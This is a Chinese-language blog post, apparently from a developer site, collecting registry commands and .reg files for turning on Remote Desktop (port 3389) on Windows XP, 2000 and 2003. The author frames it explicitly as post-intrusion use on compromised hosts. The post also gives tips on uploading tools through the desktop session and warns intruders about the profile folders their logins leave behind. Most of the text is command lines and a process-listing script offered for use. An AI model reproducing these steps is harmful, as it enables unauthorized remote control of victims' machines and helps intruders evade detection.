开启3389系列

开3389

CMD下开3389终端

命令
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

-------------------------------------------------------------------------------------------------------------

关于3389的一些很少人知道的东西

本机设置远程桌面连接就不多说了,不过要注意的是第一点在本机WinXP系统中,右键单击“我的电脑”,选择“属性”,在弹出对话框中点击“远程”选项卡,勾选“允许用户远程连接到这台计算机”项。注意!如果这项没有勾上,即使别人入侵了你的机器上传 3389工具打开了你的端口也一样是连接不上你的计算机的。我第一次使用远程桌面连接时就在这里卡了好久。默认设置是选中的。



第二点,与原先WINNT的终端服务不同,Windows XP不支持多个用户同时登录。也就是说,当其他用户远程登录你的Windows XP时,那么主机上当前正在操作的用户将自动退出,而屏幕也将黑屏。当你再次登录系统后,那么很不幸,远程用户的连接又将被中断,如果对方是拨号的ADSL,你就等着窝火吧,因为在他再次登陆的时候,需要重新拨号登陆网络,这个时候对方的IP已经换了。(需要说明的是,在Windows 2003中,允许多用户同时以本地或远程桌面连接方式登录主机)还有在微软Windows XP SP2新闻讨论组的电脑玩家们那里又流传着一个消息:那就是在安装了SP2 beta后,用户只需要在注册表编辑器中展开 HKEY_LOCAL_MARCHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core 分支,新建一个名为“EnableConcurrentSessions”的DWORD值,将键值设置为“1”,就可以让Windows XP支持两个用户。使用此法实现多用户登录时最多只允许两个用户同时登录,并且登录的必须为不同的账号。



第三点,也是很多人会忽略了的地方,如果你入侵了对方的系统并建立了一个管理员帐户,通过这个新建的帐户登陆 3389后,会在对方的%systemroot%\Documents and Settings\下生成一个和你用来登陆 3389的用户名相同名称的文件夹。里面记录着你的很多东东,各位使用肉鸡的同志注意了,说不定哪一天被人抓到就不好玩咯。同样,很多人在登陆了 3389后退出都是直接点X,这样是错误的,正确退出方法是选开始-----断开。


还有,不知道各位在登陆远程桌面后是怎样上传工具的,TFTP??我的方法是打开QQ,在本地开的QQ上传送过去......此方法适合普通用户,如果是服务器那只好下载提前放在网络空间里的东东了。说到这里可能有人会丢砖头------你丫的不如说说你之前是怎么样上传工具开了对方的 3389..........这个..........方法其实很多啦......留给大家慢慢摸索了。

另外:用WinConnect Server,可以让我们突破限制,多用户登录Windows XP的远程桌面

-----------------------------------------------------------------------------------------------------------

各种系统入侵开启3389的方法的介绍

1.windowsXP,2003下开启3389的方法

Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 
"PortNumber"=dword:00000D3D 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
"PortNumber"=dword:00000D3D 

2.windows2000下开启3389的方法

Windows Registry Editor Version 5.00 >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg 
"Enabled"="0" >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg 
"ShutdownWithoutLogon"="0" >>3389.reg 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg 
"EnableAdminTSRemote"=dword:00000001 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg 
"TSEnabled"=dword:00000001 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg 
"Start"=dword:00000002 >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg 
"Start"=dword:00000002 >>3389.reg 
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg 
"Hotkey"="1" >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg 
"PortNumber"=dword:00000D3D >>3389.reg 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg 
"PortNumber"=dword:00000D3D >>3389.reg 

netd.exe

pid:

wscript.echo "PID   ProcessName" 
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_  
wscript.echo ps.handle^&vbtab^&ps.name
next

-------------------------------------------------------------------------------------------------------------

2003/XP不重启命令行开3389
2010-08-27 13:42

2003/XP开3389其实非常简单,通常情况下一行命令就ok了(下面的第一行),为了保险起见可以把下面三行都运行(后面两行是改端口用的,但真正渗透中不建议改人家的端口,查出端口用就是了):
  1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  2. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

  3. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
查询3389端口:
  1. reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值